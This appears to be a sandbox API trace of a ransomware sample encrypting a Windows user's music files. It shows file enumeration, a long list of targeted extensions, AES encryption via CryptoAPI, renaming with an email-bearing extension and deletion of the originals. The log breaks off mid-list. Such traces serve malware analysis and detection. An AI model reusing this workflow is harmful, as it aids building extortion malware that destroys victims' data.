	[0190.602] wsprintfW (in: param_1=0x18bc40, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\music\\htfjvrtf5zhv-gvv.wav.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 90
	[0190.602] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\htfjvrtf5zhv-gvv.wav.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\htfjvrtf5zhv-gvv.wav.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0190.603] WriteFile (in: hFile=0x2c0, lpBuffer=0xfee1c8*, nNumberOfBytesToWrite=0x11040, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0xfee1c8*, lpNumberOfBytesWritten=0x18c068*=0x11040, lpOverlapped=0x0) returned 1
	[0190.609] CloseHandle (hObject=0x2c0) returned 1
	[0190.609] CloseHandle (hObject=0x384) returned 1
	[0190.609] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\htfjvrtf5zhv-gvv.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\htfjvrtf5zhv-gvv.wav")) returned 1
	[0190.618] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\htfjvrtf5zhv-gvv.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\htfjvrtf5zhv-gvv.wav")) returned 0
	[0190.618] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x838f74d0, ftCreationTime.dwHighDateTime=0x1d97584, ftLastAccessTime.dwLowDateTime=0xe3b86c0, ftLastAccessTime.dwHighDateTime=0x1d97600, ftLastWriteTime.dwLowDateTime=0xe3b86c0, ftLastWriteTime.dwHighDateTime=0x1d97600, nFileSizeHigh=0x0, nFileSizeLow=0x185cf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pWnrgyqQHLd5-c.mp3", cAlternateFileName="PWNRGY~1.MP3")) returned 1
	[0190.618] lstrcmpW (lpString1="pWnrgyqQHLd5-c.mp3", lpString2="..") returned 1
	[0190.618] lstrcmpW (lpString1="pWnrgyqQHLd5-c.mp3", lpString2=".") returned 1
	[0190.619] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Music\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\"
	[0190.619] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\", lpString2="pWnrgyqQHLd5-c.mp3" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\pWnrgyqQHLd5-c.mp3") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\pWnrgyqQHLd5-c.mp3"
	[0190.619] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Music\\pWnrgyqQHLd5-c.mp3") returned 46
	[0190.619] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0190.619] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Music\\pWnrgyqQHLd5-c.mp3", cchLength=0x2e | out: lpsz="c:\\users\\rdhj0cnfevzx\\music\\pwnrgyqqhld5-c.mp3") returned 0x2e
	[0190.619] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.619] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\pwnrgyqqhld5-c.mp3", lpSrch="help_decrypt_your_files") returned 0x0
	[0190.620] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\rdhj0cnfevzx\\music\\pwnrgyqqhld5-c.mp3" | out: lpString1="c:\\users\\rdhj0cnfevzx\\music\\pwnrgyqqhld5-c.mp3") returned="c:\\users\\rdhj0cnfevzx\\music\\pwnrgyqqhld5-c.mp3"
	[0190.620] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\music\\pwnrgyqqhld5-c.mp3") returned 46
	[0190.620] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0190.620] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.620] StrStrW (lpFirst=".mp3", lpSrch=".") returned=".mp3"
	[0190.620] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.621] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".mp3") returned=".mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0190.621] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0190.621] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0190.621] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\pwnrgyqqhld5-c.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\pwnrgyqqhld5-c.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0190.627] ReadFile (in: hFile=0x384, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x185cf, lpNumberOfBytesRead=0x18c060, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18c060*=0x185cf, lpOverlapped=0x0) returned 1
	[0190.632] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0190.632] CryptAcquireContextW (in: phProv=0x18bc10, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18bc10*=0xfcabc0) returned 1
	[0190.634] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0190.635] CryptCreateHash (in: hProv=0xfcabc0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18bc14 | out: phHash=0x18bc14) returned 1
	[0190.635] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0190.635] CryptHashData (hHash=0xfb98f0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0190.635] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0190.635] CryptDeriveKey (in: hProv=0xfcabc0, Algid=0x6610, hBaseData=0xfb98f0, dwFlags=0x1, phKey=0x18bc18 | out: phKey=0x18bc18*=0xfb9bf0) returned 1
	[0190.635] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0190.635] CryptEncrypt (in: hKey=0xfb9bf0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18bc2c*=0x185cf, dwBufLen=0x185cf | out: pbData=0x0*, pdwDataLen=0x18bc2c*=0x185d0) returned 1
	[0190.638] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0190.638] RtlMoveMemory (in: Destination=0xff5758, Source=0xfdd180, Length=0x185cf | out: Destination=0xff5758) 
	[0190.638] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0190.638] CryptEncrypt (in: hKey=0xfb9bf0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xff5758*, pdwDataLen=0x18bc0c*=0x185cf, dwBufLen=0x185d0 | out: pbData=0xff5758*, pdwDataLen=0x18bc0c*=0x185d0) returned 1
	[0190.641] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0190.641] CryptDestroyKey (hKey=0xfb9bf0) returned 1
	[0190.641] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0190.641] CryptDestroyHash (hHash=0xfb98f0) returned 1
	[0190.641] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0190.641] CryptReleaseContext (hProv=0xfcabc0, dwFlags=0x0) returned 1
	[0190.641] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0190.642] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18bc28, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18bc28*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0190.642] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0190.642] GetUserNameA (in: lpBuffer=0x18bb0c, pcbBuffer=0x18bc24 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18bc24) returned 1
	[0190.644] wsprintfW (in: param_1=0x18bc40, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\music\\pwnrgyqqhld5-c.mp3.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 88
	[0190.644] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\pwnrgyqqhld5-c.mp3.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\pwnrgyqqhld5-c.mp3.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0190.644] WriteFile (in: hFile=0x2c0, lpBuffer=0xff5758*, nNumberOfBytesToWrite=0x185d0, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0xff5758*, lpNumberOfBytesWritten=0x18c068*=0x185d0, lpOverlapped=0x0) returned 1
	[0190.652] CloseHandle (hObject=0x2c0) returned 1
	[0190.652] CloseHandle (hObject=0x384) returned 1
	[0190.652] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\pwnrgyqqhld5-c.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\pwnrgyqqhld5-c.mp3")) returned 1
	[0190.686] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\music\\pwnrgyqqhld5-c.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\pwnrgyqqhld5-c.mp3")) returned 0
	[0190.686] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66e22d0, ftCreationTime.dwHighDateTime=0x1d967ab, ftLastAccessTime.dwLowDateTime=0xcc042060, ftLastAccessTime.dwHighDateTime=0x1d96a0a, ftLastWriteTime.dwLowDateTime=0xcc042060, ftLastWriteTime.dwHighDateTime=0x1d96a0a, nFileSizeHigh=0x0, nFileSizeLow=0x1560e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="QtOp1iy-C09.m4a", cAlternateFileName="QTOP1I~1.M4A")) returned 1
	[0190.686] lstrcmpW (lpString1="QtOp1iy-C09.m4a", lpString2="..") returned 1
	[0190.687] lstrcmpW (lpString1="QtOp1iy-C09.m4a", lpString2=".") returned 1
	[0190.687] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Music\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\"
	[0190.687] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\", lpString2="QtOp1iy-C09.m4a" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\QtOp1iy-C09.m4a") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\QtOp1iy-C09.m4a"
	[0190.687] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Music\\QtOp1iy-C09.m4a") returned 43
	[0190.687] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0190.687] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Music\\QtOp1iy-C09.m4a", cchLength=0x2b | out: lpsz="c:\\users\\rdhj0cnfevzx\\music\\qtop1iy-c09.m4a") returned 0x2b
	[0190.687] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.688] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\qtop1iy-c09.m4a", lpSrch="help_decrypt_your_files") returned 0x0
	[0190.688] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\rdhj0cnfevzx\\music\\qtop1iy-c09.m4a" | out: lpString1="c:\\users\\rdhj0cnfevzx\\music\\qtop1iy-c09.m4a") returned="c:\\users\\rdhj0cnfevzx\\music\\qtop1iy-c09.m4a"
	[0190.688] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\music\\qtop1iy-c09.m4a") returned 43
	[0190.688] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0190.688] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.688] StrStrW (lpFirst=".m4a", lpSrch=".") returned=".m4a"
	[0190.688] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.689] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw